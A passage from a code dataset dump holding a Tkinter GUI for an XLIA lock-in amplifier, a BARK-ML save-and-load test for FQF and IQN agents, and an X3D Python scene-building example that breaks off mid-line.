\\\n\t\t\tfg='blue', \\\n\t\t\ttext='Frequency')\n\t\tself.LFRefFrequency.grid(row=1, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefFrequency = IntegerEntry(self.LFRefFrequency, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, \\\n\t\t\twidth=8)\n\t\tself.EntryRefFrequency.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefFrequency, \\\n\t\t\ttext = 'Hz', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=W)\n\n\t\tself.LFRefPhase = LabelFrame(self.LFRef, \\\n\t\t\tpadx=4, pady=5, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Phase')\n\t\tself.LFRefPhase.grid(row=2, column=0, sticky=N+W+E+S)\n\t\tself.EntryRefPhase = IntegerEntry(self.LFRefPhase, \\\n\t\t\tbg='white', \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=RIGHT, \\\n\t\t\twidth=8)\n\t\tself.EntryRefPhase.grid(row=0, column=0, sticky=E)\n\t\tLabel(self.LFRefPhase, \\\n\t\t\ttext = 'o', \\\n\t\t\tfont=('Helvetica', 15, 'bold'), \\\n\t\t\t).grid(row=0, column=1, sticky=N+W)\n\t\t\n\t\t### Settings ####\n\t\tself.LFSet = LabelFrame(self.master, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\ttext='Settings')\n\t\tself.LFSet.grid(row=0, column=1, sticky='news')\n\t\t\n\t\t### PreAmp_AC_Coupling ####\n\t\tself.LFCoupling = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Pre Amplification AC Coupling')\n\t\tself.LFCoupling.grid(row=0, column=0, sticky='news')\n\t\tself.BtnEnableCoupling = Checkbutton(self.LFCoupling, \\\n\t\t\t#variable=self.PreAmpAC_CouplingSelected, \\\n\t\t\tonvalue=1, offvalue=0, \\\n\t\t\ttext=' Enabled')\n\t\tself.BtnEnableCoupling.grid(row=0, column=0, sticky='news')\n\t\t\n\t\t### Set PreAmp Gain ####\n\t\tself.LFPreAmpGain = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Pre Amplification Gain', \\\n\t\t\t\tfg='blue')\n\t\tself.LFPreAmpGain.grid(row = 1,column = 0, sticky=E+W)\n\t\n\t\t### Set PostAmp Gain ####\n\t\tself.LFPostAmpGain = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Post Amplification Gain', \\\n\t\t\t\tfg='blue')\n\t\tself.LFPostAmpGain.grid(row = 2,column = 0, sticky=E+W)\n\t\t\t\t\n\t\t### Set Integrator Time Constant ####\n\t\tself.LFTimeConst = LabelFrame(self.LFSet, \\\n\t\t\tpadx=4, pady=4, text='Integrator Time Constant', \\\n\t\t\t\tfg='blue')\n\t\tself.LFTimeConst.grid(row = 3,column = 0, sticky=E+W)\n\t\t\n\t\t### OUTPUT ###\n\t\tself.LFOutput = LabelFrame(self.master, \\\n\t\t\tpadx=4, pady=4, \\\n\t\t\ttext='Output')\n\t\tself.LFOutput.grid(row=1, column=0, columnspan=2, rowspan=2, sticky='news')\n\t\tself.LFInPhaseOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='In-Phase Output')\n\t\tself.LFInPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LblInPhaseOutput = Label(self.LFInPhaseOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblInPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LFQuadratureOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Quadrature Output')\n\t\tself.LFQuadratureOutput.grid(row=0, column=1, sticky='news')\n\n\t\tself.LblQuadratureOutput = Label(self.LFQuadratureOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblQuadratureOutput.grid(row=0, column=0, sticky='news')\n\t\tself.LFAmplitudeOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Amplitude Out.')\n\t\tself.LFAmplitudeOutput.grid(row=1, column=0, sticky='news')\n\t\t\n\t\tself.LblAmplitudeOutput = Label(self.LFAmplitudeOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblAmplitudeOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\tself.LFPhaseOutput = LabelFrame(self.LFOutput, \\\n\t\t\tpadx = 40, \\\n\t\t\tfg='blue', \\\n\t\t\ttext='Phase Out.')\n\t\tself.LFPhaseOutput.grid(row=1, column=1, sticky='news')\n\t\t\n\t\tself.LblPhaseOutput = Label(self.LFPhaseOutput, \\\n\t\t\tfont=('Helvetica', 20, 'bold'), \\\n\t\t\tjustify=LEFT)\n\t\tself.LblPhaseOutput.grid(row=0, column=0, sticky='news')\n\t\t\n\t\treturn\n\t\n\tdef createOptionMenus(self, varPreAG = None, varPostAG = None, varTC = None):\n\t\tself.OMPreAmpGain = OptionMenu(self.LFPreAmpGain, varPreAG, None)#, \\\n\t\t#self.PreAmpGainSelected, None)\n\t\tself.OMPreAmpGain['menu'].delete(0, 'end')\n\t\tself.OMPreAmpGain.config(width=option_menu_width, anchor='w')\n\t\tself.OMPreAmpGain.grid(row=0, column=0, sticky=E+W)\n\n\t\tself.OMPostAmpGain = OptionMenu(self.LFPostAmpGain, varPostAG, None)#, \\\n\t\t#self.PostAmpGainSelected, None)\n\t\tself.OMPostAmpGain['menu'].delete(0, 'end')\n\t\tself.OMPostAmpGain.config(width=option_menu_width, anchor='w')\n\t\tself.OMPostAmpGain.grid(row=0, column=0, sticky=E+W)\n\n\t\tself.OMTimeConst = OptionMenu(self.LFTimeConst, varTC, None)#, \\\n\t\t#self.TimeConstSelected, None)\n\t\tself.OMTimeConst['menu'].delete(0, 'end')\n\t\tself.OMTimeConst.config(width=option_menu_width, anchor='w')\n\t\tself.OMTimeConst.grid(row=0, column=0, sticky=E+W)\n\n\t\treturn\n\t\n\tdef vConfimationPopup(self):\n\t\treturn tkMessageBox.askyesno('Could not detect XLIA', 'Connection to XLIA Device lost!\\n Try Reconnecting?', default=tkMessageBox.YES, parent = self.master)\n\n\tdef vCreatePlotFrame(self):\n\t\tself.LFPlotFrame = LabelFrame(self.master, \\\n\t\t\ttext='RT & IV Data Plots')\n\t\tself.LFPlotFrame.grid(row=0, column=2, rowspan=10, sticky=N+W+E+S)\n\t\t\n\t\treturn self.LFPlotFrame\n\nif __name__ == '__main__':\n\troot = Tk()\n\toAppXLIA = app_xlia(root)\n\troot.mainloop()\n","sub_path":"utilities/lia/app_xlia.py","file_name":"app_xlia.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"334102577","text":"# Copyright (c) 2020 fortiss GmbH\n#\n# Authors: Julian Bernhard, Patrick Hart\n#\n# This work is licensed under the terms of the MIT license.\n# For a copy, see .\n\ntry:\n import debug_settings\nexcept:\n pass\n\n\nimport unittest\nimport numpy as np\nimport os\nimport gym\nimport matplotlib\nimport time\n\n# BARK imports\nfrom bark.runtime.commons.parameters import ParameterServer\n\n# BARK-ML imports\nfrom bark_ml.environments.blueprints import \\\n DiscreteHighwayBlueprint, DiscreteMergingBlueprint\nfrom bark_ml.environments.single_agent_runtime import SingleAgentRuntime\nimport bark_ml.environments.gym\nfrom bark_ml.library_wrappers.lib_fqf_iqn_qrdqn.agent import FQFAgent, IQNAgent\nfrom bark_ml.observers.nearest_state_observer import NearestAgentsObserver\nfrom bark_ml.behaviors.discrete_behavior import BehaviorDiscreteMacroActionsML\n\n\nclass BaseAgentTests(unittest.TestCase):\n def test_agents(self):\n params = ParameterServer()\n params[\"ML\"][\"BaseAgent\"][\"NumSteps\"] = 2\n params[\"ML\"][\"BaseAgent\"][\"MaxEpisodeSteps\"] = 2\n\n bp = DiscreteHighwayBlueprint(params, number_of_senarios=10, random_seed=0)\n env = SingleAgentRuntime(blueprint=bp, render=False)\n env._observer = NearestAgentsObserver(params)\n env._action_wrapper = BehaviorDiscreteMacroActionsML(params)\n\n fqf_agent = FQFAgent(agent_save_dir=\"./save_dir\", env=env, params=params)\n fqf_agent.train_episode()\n\n fqf_agent.save(checkpoint_type=\"best\")\n fqf_agent.save(checkpoint_type=\"last\")\n\n loaded_agent = FQFAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"best\")\n loaded_agent2 = FQFAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n \n loaded_agent_with_env = FQFAgent(env=env, agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n loaded_agent_with_env.train_episode()\n\n self.assertEqual(loaded_agent.ml_behavior.action_space.n, fqf_agent.ml_behavior.action_space.n)\n self.assertEqual(loaded_agent.ent_coef, fqf_agent.ent_coef)\n return\n\n def test_iqn_agent(self):\n params = ParameterServer()\n params[\"ML\"][\"BaseAgent\"][\"NumSteps\"] = 2\n params[\"ML\"][\"BaseAgent\"][\"MaxEpisodeSteps\"] = 2\n\n bp = DiscreteHighwayBlueprint(params, number_of_senarios=10, random_seed=0)\n env = SingleAgentRuntime(blueprint=bp, render=False)\n env._observer = NearestAgentsObserver(params)\n env._action_wrapper = BehaviorDiscreteMacroActionsML(params)\n\n iqn_agent = IQNAgent(agent_save_dir=\"./save_dir\", env=env, params=params)\n iqn_agent.train_episode()\n\n iqn_agent.save(checkpoint_type=\"best\")\n iqn_agent.save(checkpoint_type=\"last\")\n\n loaded_agent = IQNAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"best\")\n loaded_agent2 = IQNAgent(agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n \n loaded_agent_with_env = IQNAgent(env=env, agent_save_dir=\"./save_dir\", checkpoint_load=\"last\")\n loaded_agent_with_env.train_episode()\n\n self.assertEqual(loaded_agent.ml_behavior.action_space.n, iqn_agent.ml_behavior.action_space.n)\n return\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"bark_ml/library_wrappers/lib_fqf_iqn_qrdqn/tests/save_load_test.py","file_name":"save_load_test.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561040506","text":"import x3dpsail as x3d\nX3D0 = x3d.X3D()\nX3D0.setProfile(\"Immersive\")\nX3D0.setVersion(\"3.3\")\n# x3dVersionComparisonTest for this model: supportsX3dVersion(X3DObject.VERSION_3_0)=true \r\nhead1 = x3d.head()\n# comment #1 \r\n# comment #2 \r\n# comment #3 \r\n# comment #4 \r\ncomponent2 = x3d.component()\ncomponent2.setName(\"Navigation\")\ncomponent2.setLevel(3)\n\nhead1.addComponent(component2)\ncomponent3 = x3d.component()\ncomponent3.setName(\"Layering\")\ncomponent3.setLevel(1)\n\nhead1.addComponent(component3)\ncomponent4 = x3d.component()\ncomponent4.setName(\"Shaders\")\ncomponent4.setLevel(1)\n\nhead1.addComponent(component4)\ncomponent5 = x3d.component()\ncomponent5.setName(\"CADGeometry\")\ncomponent5.setLevel(2)\n\nhead1.addComponent(component5)\ncomponent6 = x3d.component()\ncomponent6.setName(\"DIS\")\ncomponent6.setLevel(2)\n\nhead1.addComponent(component6)\ncomponent7 = x3d.component()\ncomponent7.setName(\"H-Anim\")\ncomponent7.setLevel(1)\n\nhead1.addComponent(component7)\nunit8 = x3d.unit()\nunit8.setName(\"AngleUnitConversion\")\nunit8.setCategory(\"angle\")\nunit8.setConversionFactor(1.0)\n\nhead1.addUnit(unit8)\nunit9 = x3d.unit()\nunit9.setName(\"LengthUnitConversion\")\nunit9.setCategory(\"length\")\nunit9.setConversionFactor(1.0)\n\nhead1.addUnit(unit9)\nunit10 = x3d.unit()\nunit10.setName(\"ForceFromPoundsToNewtons\")\nunit10.setCategory(\"force\")\nunit10.setConversionFactor(4.4482)\n\nhead1.addUnit(unit10)\nmeta11 = x3d.meta()\nmeta11.setContent(\"HelloWorldProgramOutput.x3d\")\nmeta11.setName(\"title\")\n\nhead1.addMeta(meta11)\nmeta12 = x3d.meta()\nmeta12.setContent(\"continued development and testing in progress\")\nmeta12.setName(\"info\")\n\nhead1.addMeta(meta12)\nmeta13 = x3d.meta()\nmeta13.setContent(\"Example HelloWorldProgram creates an X3D model using the X3D Java Scene Access Interface Library (X3DJSAIL)\")\nmeta13.setName(\"description\")\n\nhead1.addMeta(meta13)\nmeta14 = x3d.meta()\nmeta14.setContent(\"http://www.web3d.org/specifications/java/X3DJSAIL.html\")\nmeta14.setName(\"reference\")\n\nhead1.addMeta(meta14)\nmeta15 = x3d.meta()\nmeta15.setContent(\"HelloWorldProgramOutput.java\")\nmeta15.setName(\"generator\")\n\nhead1.addMeta(meta15)\nmeta16 = x3d.meta()\nmeta16.setContent(\"6 September 2016\")\nmeta16.setName(\"created\")\n\nhead1.addMeta(meta16)\nmeta17 = x3d.meta()\nmeta17.setContent(\"19 June 2019\")\nmeta17.setName(\"modified\")\n\nhead1.addMeta(meta17)\nmeta18 = x3d.meta()\nmeta18.setContent(\"X3D Java Scene Access Interface Library (X3DJSAIL)\")\nmeta18.setName(\"generator\")\n\nhead1.addMeta(meta18)\nmeta19 = x3d.meta()\nmeta19.setContent(\"http://www.web3d.org/specifications/java/examples/HelloWorldProgram.java\")\nmeta19.setName(\"generator\")\n\nhead1.addMeta(meta19)\nmeta20 = x3d.meta()\nmeta20.setContent(\"Netbeans http://www.netbeans.org\")\nmeta20.setName(\"generator\")\n\nhead1.addMeta(meta20)\nmeta21 = x3d.meta()\nmeta21.setContent(\"Don Brutzman\")\nmeta21.setName(\"creator\")\n\nhead1.addMeta(meta21)\nmeta22 = x3d.meta()\nmeta22.setContent(\"https://sourceforge.net/p/x3d/code/HEAD/tree/www.web3d.org/x3d/stylesheets/java/examples/HelloWorldProgramOutput.x3d\")\nmeta22.setName(\"reference\")\n\nhead1.addMeta(meta22)\nmeta23 = x3d.meta()\nmeta23.setContent(\"Console output, ClassicVRML encoding, VRML97 encoding and pretty-print documentation:\")\nmeta23.setName(\"reference\")\n\nhead1.addMeta(meta23)\nmeta24 = x3d.meta()\nmeta24.setContent(\"HelloWorldProgramOutput.txt\")\nmeta24.setName(\"reference\")\n\nhead1.addMeta(meta24)\nmeta25 = x3d.meta()\nmeta25.setContent(\"HelloWorldProgramOutput.x3dv\")\nmeta25.setName(\"reference\")\n\nhead1.addMeta(meta25)\nmeta26 = x3d.meta()\nmeta26.setContent(\"HelloWorldProgramOutput.wrl\")\nmeta26.setName(\"reference\")\n\nhead1.addMeta(meta26)\nmeta27 = x3d.meta()\nmeta27.setContent(\"HelloWorldProgramOutput.html\")\nmeta27.setName(\"reference\")\n\nhead1.addMeta(meta27)\nmeta28 = x3d.meta()\nmeta28.setContent(\"https://savage.nps.edu/X3dValidator?url=http://www.web3d.org/specifications/java/examples/HelloWorldProgramOutput.x3d\")\nmeta28.setName(\"reference\")\n\nhead1.addMeta(meta28)\nmeta29 = x3d.meta()\nmeta29.setContent(\"http://www.web3d.org/specifications/java/examples/HelloWorldProgramOutput.x3d\")\nmeta29.setName(\"identifier\")\n\nhead1.addMeta(meta29)\nmeta30 = x3d.meta()\nmeta30.setContent(\"../license.html\")\nmeta30.setName(\"license\")\n\nhead1.addMeta(meta30)\n\nX3D0.setHead(head1)\nScene31 = x3d.Scene()\nViewpointGroup32 = x3d.ViewpointGroup()\nViewpointGroup32.setDescription(\"Available viewpoints\")\nViewpoint33 = x3d.Viewpoint()\nViewpoint33.setDEF(\"DefaultView\")\nViewpoint33.setDescription(\"Hello X3DJSAIL\")\n\nViewpointGroup32.addChildren(Viewpoint33)\nViewpoint34 = x3d.Viewpoint()\nViewpoint34.setDEF(\"TopDownView\")\nViewpoint34.setDescription(\"top-down view from above\")\nViewpoint34.setOrientation([1,0,0,-1.570796])\nViewpoint34.setPosition([0,100,0])\n\nViewpointGroup32.addChildren(Viewpoint34)\n\nScene31.addChildren(ViewpointGroup32)\nNavigationInfo35 = x3d.NavigationInfo()\nNavigationInfo35.setAvatarSize([0.25,1.6,0.75])\nNavigationInfo35.setTransitionType([\"LINEAR\"])\nNavigationInfo35.setType([\"EXAMINE\",\"FLY\",\"ANY\"])\n\nScene31.addChildren(NavigationInfo35)\nWorldInfo36 = x3d.WorldInfo()\nWorldInfo36.setDEF(\"WorldInfoDEF\")\nWorldInfo36.setTitle(\"HelloWorldProgram produced by X3D Java SAI Library (X3DJSAIL)\")\n\nScene31.addChildren(WorldInfo36)\nWorldInfo37 = x3d.WorldInfo()\nWorldInfo37.setUSE(\"WorldInfoDEF\")\n\nScene31.addChildren(WorldInfo37)\nWorldInfo38 = x3d.WorldInfo()\nWorldInfo38.setUSE(\"WorldInfoDEF\")\n\nScene31.addChildren(WorldInfo38)\nMetadataString39 = x3d.MetadataString()\nMetadataString39.setDEF(\"scene.addChildMetadata\")\nMetadataString39.setName(\"test\")\nMetadataString39.setValue([\"Top-level root Metadata node beneath Scene needs to be one of '-children' in JSON encoding\"])\n\nScene31.addMetadata(MetadataString39)\nLayerSet40 = x3d.LayerSet()\nLayerSet40.setDEF(\"scene.addChildLayerSetTest\")\nLayerSet40.setOrder([0])\n\nScene31.addLayerSet(LayerSet40)\nTransform41 = x3d.Transform()\nTransform41.setDEF(\"LogoGeometryTransform\")\nTransform41.setTranslation([0,1.5,0])\nAnchor42 = x3d.Anchor()\nAnchor42.setDescription(\"select for X3D Java SAI Library (X3DJSAIL) description\")\nAnchor42.setUrl([\"../X3DJSAIL.html\",\"http://www.web3d.org/specifications/java/X3DJSAIL.html\"])\nShape43 = x3d.Shape()\nShape43.setDEF(\"BoxShape\")\nAppearance44 = x3d.Appearance()\nMaterial45 = x3d.Material()\nMaterial45.setDEF(\"GreenMaterial\")\nMaterial45.setDiffuseColor([0,1,1])\nMaterial45.setEmissiveColor([0.8,0,0])\nMaterial45.setTransparency(0.1)\n\nAppearance44.setMaterial(Material45)\nImageTexture46 = x3d.ImageTexture()\nImageTexture46.setUrl([\"images/X3dJavaSceneAccessInterfaceSaiLibrary.png\",\"http://www.web3d.org/specifications/java/examples/images/X3dJavaSceneAccessInterfaceSaiLibrary.png\"])\n\nAppearance44.setTexture(ImageTexture46)\n\nShape43.setAppearance(Appearance44)\nBox47 = x3d.Box()\nBox47.setDEF(\"test-NMTOKEN_regex.0123456789\")\nBox47.setCssClass(\"untextured\")\n\nShape43.setGeometry(Box47)\n\nAnchor42.addChildren(Shape43)\n\nTransform41.addChildren(Anchor42)\n\nScene31.addChildren(Transform41)\nShape48 = x3d.Shape()\nShape48.setDEF(\"LineShape\")\nAppearance49 = x3d.Appearance()\nMaterial50 = x3d.Material()\nMaterial50.setEmissiveColor([0.6,0.19607843,0.8])\n\nAppearance49.setMaterial(Material50)\n\nShape48.setAppearance(Appearance49)\nIndexedLineSet51 = x3d.IndexedLineSet()\nIndexedLineSet51.setCoordIndex([0,1,2,3,4,0])\n# Coordinate 3-tuple point count: 6 \r\nCoordinate52 = x3d.Coordinate()\nCoordinate52.setPoint([0,1.5,0,2,1.5,0,2,1.5,-2,-2,1.5,-2,-2,1.5,0,0,1.5,0])\n\nIndexedLineSet51.setCoord(Coordinate52)\n\nShape48.setGeometry(IndexedLineSet51)\n\nScene31.addChildren(Shape48)\nPositionInterpolator53 = x3d.PositionInterpolator()\nPositionInterpolator53.setDEF(\"BoxPathAnimator\")\nPositionInterpolator53.setKey([0,0.125,0.375,0.625,0.875,1])\nPositionInterpolator53.setKeyValue([0,1.5,0,2,1.5,0,2,1.5,-2,-2,1.5,-2,-2,1.5,0,0,1.5,0])\n\nScene31.addChildren(PositionInterpolator53)\nTimeSensor54 = x3d.TimeSensor()\nTimeSensor54.setDEF(\"OrbitClock\")\nTimeSensor54.setCycleInterval(8.0)\nTimeSensor54.setLoop(True)\n\nScene31.addChildren(TimeSensor54)\nROUTE55 = x3d.ROUTE()\nROUTE55.setFromField(\"fraction_changed\")\nROUTE55.setFromNode(\"OrbitClock\")\nROUTE55.setToField(\"set_fraction\")\nROUTE55.setToNode(\"BoxPathAnimator\")\n\nScene31.addChildren(ROUTE55)\nROUTE56 = x3d.ROUTE()\nROUTE56.setFromField(\"value_changed\")\nROUTE56.setFromNode(\"BoxPathAnimator\")\nROUTE56.setToField(\"set_translation\")\nROUTE56.setToNode(\"LogoGeometryTransform\")\n\nScene31.addChildren(ROUTE56)\nTransform57 = x3d.Transform()\nTransform57.setDEF(\"TextTransform\")\nTransform57.setTranslation([0,-1.5,0])\nShape58 = x3d.Shape()\nAppearance59 = x3d.Appearance()\nMaterial60 = x3d.Material()\nMaterial60.setUSE(\"GreenMaterial\")\n\nAppearance59.setMaterial(Material60)\n\nShape58.setAppearance(Appearance59)\nText61 = x3d.Text()\nText61.setString([\"X3D Java\",\"SAI Library\",\"X3DJSAIL\"])\n# Comment example A, plain quotation marks: He said, \\\"Immel did it!\\\" \r\n# Comment example B, XML character entities: He said, "Immel did it!" \r\nMetadataSet62 = x3d.MetadataSet()\nMetadataSet62.setName(\"EscapedQuotationMarksMetadataSet\")\nMetadataString63 = x3d.MetadataString()\nMetadataString63.setName(\"quotesTestC\")\nMetadataString63.setValue([\"MFString example C, backslash-escaped quotes: He said, \\\"Immel did it!\\\"\"])\n\nMetadataSet62.setValue(MetadataString63)\nMetadataString64 = x3d.MetadataString()\nMetadataString64.setName(\"extraChildTest\")\nMetadataString64.setValue([\"checks MetadataSetObject addValue() method\"])\n\nMetadataSet62.setValue(MetadataString64)\n\nText61.setMetadata(MetadataSet62)\nFontStyle65 = x3d.FontStyle()\nFontStyle65.setFamily([\"SERIF\"])\nFontStyle65.setJustify([\"MIDDLE\",\"MIDDLE\"])\n\nText61.setFontStyle(FontStyle65)\n\nShape58.setGeometry(Text61)\n\nTransform57.addChildren(Shape58)\nCollision66 = x3d.Collision()\n# test containerField='proxy' \r\nShape67 = x3d.Shape()\nShape67.setDEF(\"ProxyShape\")\n# alternative XML encoding: Text string='\\\"One, Two, Comment\\\" \\\"\\\" \\\"He said, \\\\"Immel did it!\\\\"\\\"' \r\n# alternative XML encoding: Text string='\\\"One, Two, Comment\\\" \\\"\\\" \\\"He said, \\\\"Immel did it!\\\\"\\\" \\\"\\\"' \r\n# alternative Java source: .setString(new String [] {\\\"One, Two, Comment\\\", \\\"\\\", \\\"He said, \\\\\\\"Immel did it!\\\\\\\"\\\"}) \r\n# reference: http://www.web3d.org/x3d/content/examples/Basic/X3dSpecifications/StringArrayEncodingExamplesIndex.html \r\nText68 = x3d.Text()\nText68.setString([\"One, Two, Text\",\"\",\"He said, \\\"Immel did it!\\\" \\\"\\\"\"])\n\nShape67.setGeometry(Text68)\n\nCollision66.setProxy(Shape67)\n\nTransform57.addChildren(Collision66)\n# It's a beautiful world \r\n# ... for you! \r\n# https://en.wikipedia.org/wiki/Beautiful_World_(Devo_song) \r\n\nScene31.addChildren(Transform57)\n# repeatedly spin 180 degrees as a readable special effect \r\nOrientationInterpolator69 = x3d.OrientationInterpolator()\nOrientationInterpolator69.setDEF(\"SpinInterpolator\")\nOrientationInterpolator69.setKey([0,0.5,1])\nOrientationInterpolator69.setKeyValue([0,1,0,4.712389,0,1,0,0,0,1,0,1.5707964])\n\nScene31.addChildren(OrientationInterpolator69)\nTimeSensor70 = x3d.TimeSensor()\nTimeSensor70.setDEF(\"SpinClock\")\nTimeSensor70.setCycleInterval(5.0)\nTimeSensor70.setLoop(True)\n\nScene31.addChildren(TimeSensor70)\nROUTE71 = x3d.ROUTE()\nROUTE71.setFromField(\"fraction_changed\")\nROUTE71.setFromNode(\"SpinClock\")\nROUTE71.setToField(\"set_fraction\")\nROUTE71.setToNode(\"SpinInterpolator\")\n\nScene31.addChildren(ROUTE71)\nROUTE72 = x3d.ROUTE()\nROUTE72.setFromField(\"value_changed\")\nROUTE72.setFromNode(\"SpinInterpolator\")\nROUTE72.setToField(\"rotation\")\nROUTE72.setToNode(\"TextTransform\")\n\nScene31.addChildren(ROUTE72)\nGroup73 = x3d.Group()\nGroup73.setDEF(\"BackgroundGroup\")\nBackground74 = x3d.Background()\nBackground74.setDEF(\"GradualBackground\")\n\nGroup73.addChildren(Background74)\nScript75 = x3d.Script()\nScript75.setDEF(\"colorTypeConversionScript\")\nfield76 = x3d.field()\nfield76.setName(\"colorInput\")\nfield76.setAccessType(\"inputOnly\")\nfield76.setType(\"SFColor\")\n\nScript75.addField(field76)\nfield77 = x3d.field()\nfield77.setName(\"colorsOutput\")\nfield77.setAccessType(\"outputOnly\")\nfield77.setType(\"MFColor\")\n\nScript75.addField(field77)\n\nScript75.setSourceCode('''\\n\"+\n\"ecmascript:\\n\"+\n\"\\n\"+\n\"function colorInput (eventValue) // Example source code\\n\"+\n\"{\\n\"+\n\" colorsOutput = new MFColor(eventValue); // assigning value sends output event\\n\"+\n\"// Browser.print('colorInput=' + eventValue + ', colorsOutput=' + colorsOutput + '\\\\n');\\n\"+\n\"}\\n\"+\n\"''')\n\nGroup73.addChildren(Script75)\nColorInterpolator78 = x3d.ColorInterpolator()\nColorInterpolator78.setDEF(\"ColorAnimator\")\nColorInterpolator78.setKey([0,0.5,1])\nColorInterpolator78.setKeyValue([0.9411765,1,1,0.29411766,0,0.50980395,0.9411765,1,1])\n# AZURE to INDIGO and back again \r\n\nGroup73.addChildren(ColorInterpolator78)\nTimeSensor79 = x3d.TimeSensor()\nTimeSensor79.setDEF(\"ColorClock\")\nTimeSensor79.setCycleInterval(60.0)\nTimeSensor79.setLoop(True)\n\nGroup73.addChildren(TimeSensor79)\nROUTE80 = x3d.ROUTE()\nROUTE80.setFromField(\"colorsOutput\")\nROUTE80.setFromNode(\"colorTypeConversionScript\")\nROUTE80.setToField(\"skyColor\")\nROUTE80.setToNode(\"GradualBackground\")\n\nGroup73.addChildren(ROUTE80)\nROUTE81 = x3d.ROUTE()\nROUTE81.setFromField(\"value_changed\")\nROUTE81.setFromNode(\"ColorAnimator\")\nROUTE81.setToField(\"colorInput\")\nROUTE81.setToNode(\"colorTypeConversionScript\")\n\nGroup73.addChildren(ROUTE81)\nROUTE82 = x3d.ROUTE()\nROUTE82.setFromField(\"fraction_changed\")\nROUTE82.setFromNode(\"ColorClock\")\nROUTE82.setToField(\"set_fraction\")\nROUTE82.setToNode(\"ColorAnimator\")\n\nGroup73.addChildren(ROUTE82)\n\nScene31.addChildren(Group73)\nProtoDeclare83 = x3d.ProtoDeclare()\nProtoDeclare83.setName(\"ArtDeco01Material\")\nProtoDeclare83.setAppinfo(\"tooltip: ArtDeco01Material prototype is a Material node\")\nProtoInterface84 = x3d.ProtoInterface()\nfield85 = x3d.field()\nfield85.setName(\"description\")\nfield85.setAccessType(\"inputOutput\")\nfield85.setAppinfo(\"tooltip for descriptionField\")\nfield85.setType(\"SFString\")\nfield85.setValue(\"ArtDeco01Material prototype is a Material node\")\n\nProtoInterface84.addField(field85)\nfield86 = x3d.field()\nfield86.setName(\"enabled\")\nfield86.setAccessType(\"inputOutput\")\nfield86.setType(\"SFBool\")\nfield86.setValue(\"true\")\n\nProtoInterface84.addField(field86)\n\nProtoDeclare83.setProtoInterface(ProtoInterface84)\nProtoBody87 = x3d.ProtoBody()\n# Initial node of ProtoBody determines prototype node type \r\nMaterial88 = x3d.Material()\nMaterial88.setAmbientIntensity(0.25)\nMaterial88.setDiffuseColor([0.282435,0.085159,0.134462])\nMaterial88.setShininess(0.127273)\nMaterial88.setSpecularColor([0.276305,0.11431,0.139857])\n\nProtoBody87.addChildren(Material88)\n# [HelloWorldProgram diagnostic] should be connected to scene graph: artDeco01ProtoDeclare.getNodeType()=\\\"Material\\\" \r\n# presence of follow-on TouchSensor shows that additional nodes are allowed in ProtoBody after initial node, regardless of node types \r\nTouchSensor89 = x3d.TouchSensor()\nTouchSensor89.setDescription(\"within ProtoBody\")\nIS90 = x3d.IS()\nconnect91 = x3d.connect()\nconnect91.setNodeField(\"description\")\nconnect91.setProtoField(\"description\")\n\nIS90.addConnect(connect91)\nconnect92 = x3d.connect()\nconnect92.setNodeField(\"enabled\")\nconnect92.setProtoField(\"enabled\")\n\nIS90.addConnect(connect92)\n\nTouchSensor89.setIS(IS90)\n\nProtoBody87.addChildren(TouchSensor89)\n\nProtoDeclare83.setProtoBody(ProtoBody87)\n\nScene31.addChildren(ProtoDeclare83)\nExternProtoDeclare93 = x3d.ExternProtoDeclare()\nExternProtoDeclare93.setName(\"ArtDeco02Material\")\nExternProtoDeclare93.setAppinfo(\"this is a different Material node\")\nExternProtoDeclare93.setUrl([\"http://X3dGraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/ArtDecoPrototypesExcerpt.x3d#ArtDeco02Material\",\"http://X3dGraphics.com/examples/X3dForWebAuthors/Chapter14Prototypes/ArtDecoPrototypesExcerpt.x3dv#ArtDeco02Material\"])\n# [HelloWorldProgram diagnostic] artDeco02ExternProtoDeclare.getNodeType()=\\\"ERROR_UNKNOWN_EXTERNPROTODECLARE_NODE_TYPE: ExternProtoDeclare name='ArtDeco02Material' type cannot be remotely accessed at run time. TODO X3DJSAIL needs to add further capability that retrieves the ExternProtoDeclare file.\\\" \r\nfield94 = x3d.field()\nfield94.setName(\"description\")\nfield94.setAccessType(\"inputOutput\")\nfield94.setAppinfo(\"tooltip 